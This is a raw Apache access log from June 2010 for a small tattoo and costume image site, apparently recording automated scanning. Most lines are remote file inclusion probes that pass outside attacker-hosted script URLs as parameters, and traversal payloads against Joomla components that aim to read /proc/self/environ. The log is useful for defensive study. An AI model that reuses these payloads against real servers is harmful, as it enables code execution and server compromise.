208.116.46.58 - - [13/Jun/2010:05:07:14 -0500] "GET /logs/access_log.1274572800/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:20 -0500] "GET /logs/index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:20 -0500] "GET /logs/access_log.1271548800/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:20 -0500] "GET /index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:20 -0500] "GET /logs/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:21 -0500] "GET /index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:21 -0500] "GET /logs/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:21 -0500] "GET /logs/access_log.1271548800/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:22 -0500] "GET /index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:22 -0500] "GET /logs/access_log.1274572800/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:22 -0500] "GET /logs/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:23 -0500] "GET /logs/access_log.1274572800%20%20/index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:27 -0500] "GET /index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:07:27 -0500] "GET /logs/access_log.1271548800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:07:27 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:07:27 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ysymca.or.kr/bbs/icon/fx1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:07:28 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ysymca.or.kr/bbs/icon/fx1.txt???? HTTP/1.1" 404 362 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:07:28 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ysymca.or.kr/bbs/icon/fx1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
188.72.70.56 - - [13/Jun/2010:05:07:28 -0500] "GET /logs/access_log.1271548800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ysymca.or.kr/bbs/icon/fx1.txt???? HTTP/1.1" 404 384 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:28 -0500] "GET /index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:31 -0500] "GET /logs/index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:32 -0500] "GET /logs/access_log.1271548800/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:33 -0500] "GET /logs/access_log.1271721600/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:33 -0500] "GET /logs/access_log.1271721600/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.116.46.58 - - [13/Jun/2010:05:07:37 -0500] "GET /logs/access_log.1271721600/index2.php?url_page=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:40 -0500] "GET /logs/access_log.1274572800/index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:40 -0500] "GET /logs/index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:46 -0500] "GET /logs/access_log.1274572800/index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:49 -0500] "GET /index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.129.167.25 - - [13/Jun/2010:05:07:49 -0500] "GET /logs/index2.php?url_page=http://wagnersnet.com/components/com_extplorer/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:05:10:02 -0500] "GET /logs/access_log.1270857600/index1.php?x=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:05:10:03 -0500] "GET /index1.php?x=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:05:10:03 -0500] "GET /logs/index1.php?x=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.80.193.27 - - [13/Jun/2010:05:10:45 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {813D0A76-CAD8-4E21-A243-430E624D37EB}; iebar; acc=; acc=none)"
174.133.206.82 - - [13/Jun/2010:05:13:21 -0500] "GET /index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:05:13:21 -0500] "GET /logs/index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:05:13:31 -0500] "GET /logs/access_log.1274572800%20%20/index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.2.170 - - [13/Jun/2010:05:15:02 -0500] "GET /logs/.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:15:03 -0500] "GET /.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:15:03 -0500] "GET /logs/.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:15:03 -0500] "GET /logs/.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:15:03 -0500] "GET /.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:15:03 -0500] "GET /.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.803"
174.133.206.82 - - [13/Jun/2010:05:15:04 -0500] "GET /index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:05:15:04 -0500] "GET /logs/access_log.1271721600/index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:05:15:18 -0500] "GET /logs/access_log.1271808000/index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
219.240.36.36 - - [13/Jun/2010:05:15:51 -0500] "GET /*?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.65"
91.121.2.170 - - [13/Jun/2010:05:16:37 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:16:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:16:38 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:17:15 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:17:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:17:16 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:17:45 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:17:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.2.170 - - [13/Jun/2010:05:17:46 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
222.150.117.16 - - [13/Jun/2010:05:20:23 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://www.google.co.jp/imglanding?q=free%20vector%20tattoo&imgurl=http://www.sailorjerry.com/d/desktop_may09_3.gif&imgrefurl=http://www.sailorjerry.com/hype.php%3Fentry%3D781&usg=__vN9zfHCRy72B_IeVRe9O_DeQLQk=&h=1200&w=1600&sz=1336&hl=ja&um=1&itbs=1&tbnid=ViCz3nGiX4DK3M:&tbnh=113&tbnw=150&prev=/images%3Fq%3Dfree%2Bvector%2Btattoo%26tbnid%3DunSS6N9D1nAgrM%26tbnh%3D0%26tbnw%3D0%26um%3D1%26hl%3Dja%26sa%3DX%26rlz%3D1T4SUNA_jaJP327%26ndsp%3D18%26imgtype%3Di_similar%26tbs%3Disch:1&tbnid=unSS6N9D1nAgrM&tbnh=0&tbnw=0&um=1&sa=X&rlz=1T4SUNA_jaJP327&ndsp=18&imgtype=i_similar&tbs=isch:1&start=2""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; GTB0.0; .NET CLR 1.1.4322)"
219.240.36.36 - - [13/Jun/2010:05:20:29 -0500] "GET /*?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.65"
174.37.143.198 - - [13/Jun/2010:05:20:39 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.37.143.198 - - [13/Jun/2010:05:20:39 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.37.143.198 - - [13/Jun/2010:05:20:39 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.37.143.198 - - [13/Jun/2010:05:20:39 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.195.112.180 - - [13/Jun/2010:05:20:39 -0500] "GET /?M=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.206.82 - - [13/Jun/2010:05:20:40 -0500] "GET /logs/access_log.1274572800%20%20/index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.208.42 - - [13/Jun/2010:05:22:13 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.208.42 - - [13/Jun/2010:05:22:13 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
219.240.36.36 - - [13/Jun/2010:05:22:21 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
91.121.208.42 - - [13/Jun/2010:05:23:14 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
174.133.206.82 - - [13/Jun/2010:05:24:12 -0500] "GET /logs/access_log.1271808000/index1.php?dat=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [13/Jun/2010:05:24:29 -0500] "GET /costume/thmb6.htm HTTP/1.0" 200 3210 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.47.211.173 - - [13/Jun/2010:05:24:47 -0500] "GET /logs////index2.php?option=com_frontpage&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.79"
72.47.211.173 - - [13/Jun/2010:05:24:47 -0500] "GET ////index2.php?option=com_frontpage&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.79"
91.121.208.42 - - [13/Jun/2010:05:25:17 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.208.42 - - [13/Jun/2010:05:25:18 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.208.42 - - [13/Jun/2010:05:25:18 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.46.195.230 - - [13/Jun/2010:05:26:06 -0500] "GET /?M=A HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.50 - - [13/Jun/2010:05:26:06 -0500] "GET /logs/access_log.1248048000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.144 - - [13/Jun/2010:05:27:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.71.144 - - [13/Jun/2010:05:27:11 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
67.195.112.180 - - [13/Jun/2010:05:35:04 -0500] "GET /logs/access_log.1247270400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [13/Jun/2010:05:35:45 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
205.134.252.26 - - [13/Jun/2010:05:36:24 -0500] "GET /modules/My_eGallery/index.php?basepath=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
205.134.252.26 - - [13/Jun/2010:05:36:28 -0500] "GET /logs/access_log.1271548800/modules/My_eGallery/index.php?basepath=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
205.134.252.26 - - [13/Jun/2010:05:36:28 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.46.199.38 - - [13/Jun/2010:05:38:36 -0500] "GET /logs/access_log.1214697600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [13/Jun/2010:05:42:21 -0500] "GET /logs/access_log.1211155200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.120.226.47 - - [13/Jun/2010:05:47:21 -0500] "GET /logs/access_log.1271548800/config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:05:47:21 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.120.226.47 - - [13/Jun/2010:05:47:21 -0500] "GET /config/dbutil.bck.php?confdir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
72.52.150.147 - - [13/Jun/2010:05:48:25 -0500] "GET /logs/setup.php?dir=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.52.150.147 - - [13/Jun/2010:05:48:25 -0500] "GET /setup.php?dir=http://www.aceinfosearch.com//config/xml/.logs? HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.30.142.216 - - [13/Jun/2010:05:49:00 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [13/Jun/2010:05:49:00 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.97.239.115 - - [13/Jun/2010:05:50:29 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:51:04 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.819"
222.150.117.16 - - [13/Jun/2010:05:51:04 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.co.jp/imglanding?q=free%20vector%20tattoo&imgurl=http://cdn3.ioffer.com/img/item/839/458/36/o_b2gqu59iAfZ5WNJ.jpg&imgrefurl=http://www.ioffer.com/i/SAILOR-JERRY-Collins-TATTOO-flash-sheet-5a-EAGLE-CREST-83945836&usg=__jQFBts69Q6yHbfNSnhXQlcxT0LI=&h=436&w=580&sz=56&hl=ja&um=1&itbs=1&tbnid=m8NDpk3oDDmYtM:&tbnh=101&tbnw=134&prev=/images%3Fq%3Dfree%2Bvector%2Btattoo%26tbnid%3DBzzm9xBFpZZVGM%26tbnh%3D0%26tbnw%3D0%26um%3D1%26hl%3Dja%26sa%3DX%26rlz%3D1T4SUNA_jaJP327%26ndsp%3D18%26imgtype%3Di_similar%26tbs%3Disch:1&tbnid=Bzzm9xBFpZZVGM&tbnh=0&tbnw=0&um=1&sa=X&rlz=1T4SUNA_jaJP327&ndsp=18&imgtype=i_similar&tbs=isch:1&start=0""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; YTB720; GTB0.0; .NET CLR 1.1.4322)"
216.97.239.115 - - [13/Jun/2010:05:51:06 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:51:11 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:51:21 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:51:45 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:51:46 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:51:46 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:52:08 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:52:47 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:52:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:52:47 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.819"
62.44.82.61 - - [13/Jun/2010:05:53:25 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.44.82.61 - - [13/Jun/2010:05:53:26 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.97.239.115 - - [13/Jun/2010:05:53:55 -0500] "GET /logs/access_log.1274572800/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:53:56 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:53:56 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:54:00 -0500] "GET /logs/access_log.1274832000/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:54:00 -0500] "GET /*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:54:00 -0500] "GET /logs/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:54:06 -0500] "GET /logs/access_log.1274572800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:54:06 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:54:06 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.819"
62.44.82.61 - - [13/Jun/2010:05:54:20 -0500] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.44.82.61 - - [13/Jun/2010:05:54:20 -0500] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
216.97.239.115 - - [13/Jun/2010:05:54:31 -0500] "GET /logs/access_log.1274832000/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:54:35 -0500] "GET /logs/access_log.1274832000/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:55:20 -0500] "GET /logs/access_log.1274572800/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:55:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.819"
87.106.183.116 - - [13/Jun/2010:05:55:35 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:05:55:35 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:05:55:38 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.183.116 - - [13/Jun/2010:05:55:38 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.97.239.115 - - [13/Jun/2010:05:55:44 -0500] "GET /logs/access_log.1274572800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:55:59 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.819"
216.97.239.115 - - [13/Jun/2010:05:56:00 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.819"
